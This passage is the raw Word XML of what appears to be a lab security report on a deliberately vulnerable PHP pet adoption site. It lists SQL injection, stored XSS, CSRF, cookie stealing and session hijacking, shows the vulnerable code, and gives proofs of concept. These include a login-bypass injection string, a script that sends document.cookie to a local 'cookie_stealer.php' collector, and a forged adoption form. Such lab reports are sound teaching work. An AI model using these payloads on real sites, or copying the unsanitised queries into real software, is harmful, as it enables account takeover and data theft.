          <w:p w14:paraId="2D70F5DF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>├── includes/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6195451A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│   ├──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header.php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# Page header</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3688CF29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│   └──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footer.php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# Page footer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39803422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>├── uploads/                  # File upload directory</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="065CC6D6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├──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ndex.php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     # Homepage</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3044A1FC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├──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login.php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     # Login page (SQL Injection)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54071AC2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├──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register.php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  # Registration page</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F9A78FE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├──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feedback.php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  # Feedback page (XSS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54206D0F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├──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adopt.php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     # Adoption page (CSRF)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B04A88B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├──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av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ailable_pets.php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# Browse pets</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CC2E35D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├──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my_adoptions.php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# User adoptions</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B996530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├──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profile.php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   # User profile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26CBCCC3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├──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search.php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    # Search pets</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="737B2503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├──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save_pet.php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  # Save favorite pets</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5647CB91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├──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logout.php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    #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Logout</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B594DAC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├──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cors_api.php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  # API endpoint</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C058AB6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└──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pet_adoption.sql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# Database dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C6D015B" w14:textId="66F362A7" w:rsidR="00534F07" w:rsidRDefault="003B2EC8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C7EDB" w14:textId="77777777" w:rsidR="00534F07" w:rsidRDefault="00534F07"/>
    <w:p w14:paraId="08E5C822" w14:textId="723B6BE2" w:rsidR="00534F07" w:rsidRDefault="00534F07"/>
    <w:p w14:paraId="6CA6AB65" w14:textId="510A29EA" w:rsidR="00534F07" w:rsidRDefault="00534F07"/>
    <w:p w14:paraId="10E15BE7" w14:textId="77777777" w:rsidR="00534F07" w:rsidRDefault="00534F07" w:rsidP="00534F07">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Pet Adoption Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF6E953" w14:textId="308F6C3C" w:rsidR="00534F07" w:rsidRDefault="00534F07"/>
    <w:p w14:paraId="5CDF1FDD" w14:textId="77777777" w:rsidR="00534F07" w:rsidRDefault="00534F07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="438F9075" wp14:editId="4FD1D4FC">
            <wp:extent cx="6400800" cy="335216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6-07-08 at 10.12.33 PM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2A6BD" w14:textId="77777777" w:rsidR="00534F07" w:rsidRDefault="00534F07"/>
    <w:p w14:paraId="4FC1BBD0" w14:textId="77777777" w:rsidR="00534F07" w:rsidRDefault="00534F07"/>
    <w:p w14:paraId="5D529BCA" w14:textId="1D9DC42D" w:rsidR="00534F07" w:rsidRDefault="00534F07" w:rsidP="00534F07">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F1406D0" wp14:editId="564F0A94">
            <wp:extent cx="4181399" cy="375828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6-07-08 at 10.16.31 PM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1399" cy="3758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BB3D6" w14:textId="77777777" w:rsidR="00773B2E" w:rsidRDefault="00773B2E" w:rsidP="00534F07">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4706397E" w14:textId="76B03997" w:rsidR="00534F07" w:rsidRDefault="00534F07"/>
    <w:p w14:paraId="52354CE5" w14:textId="5D92A98E" w:rsidR="00534F07" w:rsidRDefault="00773B2E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53CBE6A3" wp14:editId="0080859E">
            <wp:extent cx="6400800" cy="485330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 Image 2026-07-08 at 10.17.08 PM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5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F9E67" w14:textId="3BADC259" w:rsidR="00773B2E" w:rsidRDefault="00773B2E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F008DE3" wp14:editId="06AD2694">
            <wp:extent cx="6400800" cy="3668395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hatsApp Image 2026-07-08 at 10.17.30 PM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6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5AE38" w14:textId="21D95E8C" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="2B0CECB0" w14:textId="136AAA79" w:rsidR="00773B2E" w:rsidRDefault="00773B2E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E14632D" wp14:editId="669F96D7">
            <wp:extent cx="6400800" cy="33743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hatsApp Image 2026-07-08 at 10.18.05 PM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A9ACD" w14:textId="6CE3DED0" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="7CE7BDC1" w14:textId="6167A067" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="5F818308" w14:textId="068CAE2A" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="5E023615" w14:textId="15E19FA5" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="0BB63285" w14:textId="67BCC6EB" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="502824D3" w14:textId="2F198B5E" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="02047164" w14:textId="7F7EAD71" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="39D0B706" w14:textId="170A2C09" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="7C481A5A" w14:textId="7527DAAA" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="14FCA239" w14:textId="3AE81EED" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="75F7491B" w14:textId="2ABC76F0" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="1B2B9ED8" w14:textId="73798D25" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="1928CBFD" w14:textId="4D267304" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="57172C94" w14:textId="2F161896" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="7DB9FEC4" w14:textId="636FA1F5" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="4CA51E7A" w14:textId="758F0C6D" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="0BDCB733" w14:textId="2D6CCDE9" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="422427D4" w14:textId="0018D519" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="53B3D4D5" w14:textId="34F8C46D" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="469450EE" w14:textId="42F1914E" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="486024D1" w14:textId="2B714AB5" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="344BC0FF" w14:textId="5937B5CD" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="49465808" w14:textId="2AAC0D97" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="259215CD" w14:textId="705B18EF" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="71D88341" w14:textId="1A304D53" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="4A13349B" w14:textId="5DD5F4C6" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="741C414B" w14:textId="7B01D3A0" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="1020AB39" w14:textId="50555431" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="748BB543" w14:textId="2EB5C6E6" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="0E9C2D44" w14:textId="188136AA" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="301ACAA3" w14:textId="0EDC8F82" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="3E7A1BDC" w14:textId="6D8B9226" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="1E72A3BC" w14:textId="77777777" w:rsidR="00773B2E" w:rsidRDefault="00773B2E"/>
    <w:p w14:paraId="7259FAAE" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Vulnerabilities Found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F2D382" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>4.1 Vulnerability Summary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200"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="3450"/>
      </w:tblGrid>
      <w:tr w:rsidR="00162DB5" w14:paraId="35A36C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8E416" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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43133C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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45B1C0" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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C0DB21" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="5B7AAEB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8C69E8" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8"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C7D34D" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0231FF" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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44FBBE" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>login.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="5AE2B64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8E9FA5" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8"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3200" w:type="dxa"/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8F30A4" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/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49EA28" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3450" w:type="dxa"/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A8CD90" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>feedback.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="423C311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786929" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8"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6724C9" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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FAF328" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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4F31F3" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>adopt.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="4E824EB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34E65A" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/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75C2BD" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Cookie Stealing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/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BCC7C5" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3450" w:type="dxa"/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4894D3" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>feedback.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00162DB5" w14:paraId="6EDE826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12002A" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc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9D54F9" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Session Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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D1CF43" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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093262" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PHPSESSID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="693EDC4D" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="00162DB5">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B96591B" w14:textId="685D3C8D" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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 xml:space="preserve">4.2 SQL Injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E52033" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="10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Location: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E1111A2" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description: user input is concatenated directly into a SQL query without sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDE23CE" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Vulnerable Code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162DB5" w14:paraId="6376E6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4F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8107944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>$query = "SELECT * FROM users WHERE email = '$email' AND password = '$password'";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B0900F7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$result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mysqli_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query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$conn, $query);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="637DABEE" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Proof of Concept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162DB5" w14:paraId="18C6D0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4F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739C52A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>Email: ' OR '1'='1'#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4DD831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>Password: anything</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B6B93E8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69162FC1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>-- Resulting Query:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1332DE5A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>SELECT * FROM users WHERE email = '' OR '1'='1'#' AND password = 'anything'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2188D101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>-- '1'='1' is always true, returns first user (admin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E3CA6F8" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE2C79" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Unauthorized login as any user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415CD029" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Data extraction (usernames, passwords, emails)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA8332" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Database manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877E7E2" w14:textId="5BE8E269" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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>4.3 Stored XSS &amp; C</w:t>
      </w:r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 xml:space="preserve">ookie Stealing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B07B752" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="10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Location: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>feedback.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3210A60C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description: user input is stored and later rendered without sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BEEB5B" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Vulnerable Code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162DB5" w14:paraId="36D39E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4F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57E977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>// Insertion - No sanitization</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DA420D1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>INSERT INTO feedback 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, comment, rating) VALUES ($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, '$comment', $rating)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C8BE0AB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1D36EBCC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>// Display - Raw output</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F00A555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lastRenderedPageBreak/>
              <w:t>&lt;?php echo $feedback['comment']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; ?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&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F82A78D" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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lastRenderedPageBreak/>
        <w:t>Proof of Concept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162DB5" w14:paraId="221B71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4F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262C490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>&lt;script&gt;fetch("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http://localhost/cookie_stealer.php?cookie="+document.cookie)&lt;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/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11CAD8AF" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Im</w:t>
      </w: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pact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE76739" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Cookie theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216FD1A5" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Session hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA7BE9" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Account takeover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480072BC" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Defacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543E6F03" w14:textId="42C3B0AA" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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 xml:space="preserve">4.4 CSRF </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A35A253" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8">
      <w:pPr>
        <w:spacing w:after="10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Location: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>adopt.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76A13AFE" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Description: no CSRF tokens or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>referer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validation on state-changing requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22611165" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Proof of Concept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162DB5" w14:paraId="0341C2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4F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0E5118F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>&lt;form action="http://localhost/pet_adoption/adopt.php" method="POST"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EDF4176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&lt;input type="hidden" name="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pet_id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" value="1"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05DF33A6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&lt;input type="hidden" name="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" value="1"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ECD15FC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&lt;button&gt;Claim Prize&lt;/button&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CD1449A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>&lt;/form&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CDEF49C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605AAC3C" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Unauthorized adoption requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118E6709" w14:textId="77777777" w:rsidR="00162DB5" w:rsidRDefault="003B2EC8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Accou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
